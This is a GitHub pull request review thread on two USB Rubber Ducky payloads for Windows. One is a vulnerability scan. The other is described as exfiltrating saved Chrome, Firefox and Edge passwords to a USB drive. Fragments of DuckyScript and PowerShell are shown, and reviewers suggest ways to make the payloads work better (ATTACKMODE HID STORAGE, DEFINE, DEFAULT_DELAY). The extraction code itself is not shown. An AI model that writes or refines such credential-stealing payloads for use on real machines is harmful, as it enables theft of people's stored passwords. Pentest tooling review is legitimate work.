Added Vulnerability Scanning Script And Password Exfiltration For Various Browsers #452
These appear to be written for the Flipper, based on some common patterns you used and the lack of best practices for USB Rubber Ducky. So I'd like to confirm: is this the case? @MarkCyber
My apologies for the issues. I have made some changes and will apply/send a new pull request shortly.
@dallaswinger but just to confirm, what other changes can be made to ensure it fits the best practices for USB Rubber Ducky? I figured it was the same scripting methodology and just needed to be formatted differently... am I missing something?
REM %%%%%%%%%%%%%% Description: This script exfiltrates credentials %%%%%%%%%%%%%% | ||
REM %%%%%%%%%%%%%% Target: Firefox, Chrome, Edge on Windows Machines %%%%%%%%%%%%%% | ||
REM %%%%%%%%%%%%%% Category: Exfiltration %%%%%%%%%%%%%% | ||
REM %%%%%%%%%%%%%% This script requires a secondary USB named "MYUSB" to save credentials to %%%%%%%%%%%%%% |
The Ducky can do this. You can specify ATTACKMODE HID STORAGE for the Ducky to act as both a storage device and a HID device.
ENTER | ||
DELAY 1500 | ||
REM Check if the USB drive exists | ||
STRING $usbDrive = Get-WmiObject Win32_Volume ^| Where-Object { $_.Label -eq 'MYUSB' } ^| Select-Object -ExpandProperty DriveLetter; |
The default drive label for the Ducky is DUCKY, but for users who might not be using the default label I would suggest using a DEFINE at the start of the payload.
You would do this by adding to the top of the payload:
DEFINE #DUCKY_DRIVE_LABEL DUCKY
and then update references to the drive label to be something like (in the case of this line):
STRING $usbDrive = Get-WmiObject Win32_Volume ^| Where-Object { $_.Label -eq '#DUCKY_DRIVE_LABEL DUCKY' } ^| Select-Object -ExpandProperty DriveLetter;
You can also use STRINGLN rather than STRING. STRINGLN acts just like STRING ENTER.
DELAY 500 | ||
STRING cd $usbDrive | ||
ENTER | ||
DELAY 500 |
I see you are using a lot of DELAY 500. You can set a default delay that applies to every line unless otherwise defined. You can do this by adding DEFAULT_DELAY 500 to the start of your payload.
REM %%%%%%%%%%%%%% Description: This script scans for vulnerabilities %%%%%%%%%%%%%% | ||
REM %%%%%%%%%%%%%% Target: Windows machines with admin access %%%%%%%%%%%%%% | ||
REM %%%%%%%%%%%%%% Category: Recon %%%%%%%%%%%%%% | ||
REM %%%%%%%%%%%%%% This script requires a secondary USB named "MYUSB" to save credentials to %%%%%%%%%%%%%% |
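Review bot: The last REM line of this header says the secondary USB is needed "to save credentials to", which contradicts the Description line above it ("This script scans for vulnerabilities") and the Category line ("Recon"). It reads as if it was copied unchanged from the exfiltration payload's header. Reword it so the header states what this payload actually writes to the drive, so that anyone reviewing or auditing the file can tell its scope from the header alone.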
Again, the Ducky can do this. You can specify ATTACKMODE HID STORAGE for the Ducky to act as both a storage device and a HID device.
DELAY 200 | ||
REM Create the PowerShell script in memory and execute it | ||
DELAY 200 | ||
STRING $usbName = "MYUSB" |
This will not work. This will output as $usbName = "MYUSB" being typed. The way to do this would be using DEFINE at the start of your payload. For example,
DEFINE #DUCKY_DRIVE_LABEL DUCKY
STRING $usbName = "#DUCKY_DRIVE_LABEL DUCKY"
then you can call this definition
STRING $owner = (Get-WmiObject Win32_ComputerSystem).UserName | ||
DELAY 200 | ||
ENTER | ||
DELAY 200 |
You can use DEFAULT_DELAY to clean up all these DELAY 200.
Added 2 scripts, one that scans for vulnerabilities in a Windows machine via checking for open ports, misconfigured/missing updates, password policy, firewall rules and antivirus status, logs, and much more. Also added another script that exfiltrates saved passwords from Chrome, Firefox and Edge to a secondary USB.